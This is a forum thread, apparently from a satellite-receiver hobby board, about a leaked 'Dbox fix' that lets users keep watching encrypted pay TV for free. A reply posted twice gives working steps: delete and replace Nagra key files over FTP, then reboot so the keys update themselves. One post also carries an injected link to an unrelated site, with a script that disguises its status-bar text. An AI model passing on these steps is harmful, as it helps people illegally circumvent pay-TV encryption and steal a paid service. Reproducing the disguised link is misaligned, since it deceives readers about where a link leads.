Dbox fix

Well thanks to whoever leaked this.

I would've released it myself probably today or tomorrow but obviously some people can't wait.

Well don't know who it was but you have them to thank - no more fixes from me.

Someone else will fookin have to do it next time LOL.

Enjoy your free tv for the time being.

FFS not again, very disappointing, it's looks as though next time there will be no one left to produce a fix.

I for one appreciate your effort and would have been happy to wait for it to be officially released. I wasn't getting far trying to fix it myself :(

How many people had a copy? Maybe admin at the forum it was released to will reveal the source.

Before I do the transfers - do i neet to turn off AU? If so - how do i <a onMouseOver="javascript:window.status='do it';return true;" onMouseOut="javascript:window.status='';return true;" href="http://azulemule.info?v=1%2E21&ss=do+it">do it</a> pls? or does it not matter?

no you dont need to turn the au off you need it on, all u do is connect to ur box using ftp then go the var/keys and var/scce folders delete the nagrarom10.bin and nagrarom11.bin and the send the downloaded nagrarom7.bin into the box in both scce and key folders once this is done reboot your box and within a minute the keys should update themselves

If you have a computer (which you obviously do) why is a FTP fix no use for you?

It is something you will need to set up in order to change/ transfer files in the future.

:drink:

Methinks you drink too much, FTP is no problem for ME... I was replying to the question about can the fix be applied by remote. So lay off the sauce and read the posts a little more carefully. I have made one other comment regarding megaupload which does not work for me, we straight now?

no you dont need to turn the au off you need it on, all u do is connect to ur box using ftp then go the var/keys and var/scce folders delete the nagrarom10.bin and nagrarom11.bin and the send the downloaded nagrarom7.bin into the box in both scce and key folders once this is done reboot your box and within a minute the keys should update themselves

Super! thanks alot - will try this out. Thanks again

I would've released it myself probably today or tomorrow but obviously some people can't wait.

Long time knowledge like yours is very much appreciated by the majority around here and elsewhere. There are always going to be tw*ts and spoilers in so much of a hurry for the free rather than the learning.

I hope you keep going, as your posts over the past few years have kept a lot of people going trying to understand and learn.

Kudos to you...

Methinks you drink too much, FTP is no problem for ME... I was replying to the question about can the fix be applied by remote. So lay off the sauce and read the posts a little more carefully. I have made one other comment regarding megaupload which does not work for me, we straight now?

Is this for me ?? FTP fix no good as no cables and no know how !!!

Sorry 2 sound stupid do i need to hook this to a pc to do so

A big thanks should go out to cydine, alot of you are only interested in getting your box working again and not where the fix came from or how much time people like cydine put into solving these problems. ( how do i do it, where do i put it ). Whoever leaked it should own up to cydine and explain why and hope he doesnt take a back seat in future.

Many thanks to cydine for this and hope whoever leaked it owns up to cydine.

Those of us who have been around long enough know who we owe credit to, regardless of the releaser. Your support, time and that you can still be arsed to help mean something to alot of people. Now i`m back off back to bed as its 4.15am:FRIGHT:.

Last edited:

Sorry to hear someone has done that to you m8
Many Thanks for all your work in the past and this Fix.

Respect !!

Cheers

Xenafan

Thats a shame cydine,I thought somebody else had figured it out and posted it.Not even a word of thanks or the name of the author of the fix.Dont loose faith cydine your talent is well known and well regarded.better watch out who you share things with......

I am a complete amateur at all this so please be gentle.

I always use IFA to flash my box. Is there a way getting the fix onto the dbox using IFA?

Or is there an up to date image available with the fix built in?

If not whats the easiest FTP program to use? I’ve tried some in the past but I can never get it working which is why I stick to IFA.

Thanks to Cydine for taking the time and effort to get the fix done so quick you the man!!!

I am a complete amateur at all this so please be gentle.

I always use IFA to flash my box. Is there a way getting the fix onto the dbox using IFA?

Or is there an up to date image available with the fix built in?

If not whats the easiest FTP program to use? I’ve tried some in the past but I can never get it working which is why I stick to IFA.

Thanks to Cydine for taking the time and effort to get the fix done so quick you the man!!!

flash fxp you can download a 30 day trial from their website just google it.

thebigman

Respect and rep points given mate.

To the person/s that released this members work without his permission - SHAME ON YOU :ASSFLASH:

Muskrat

Back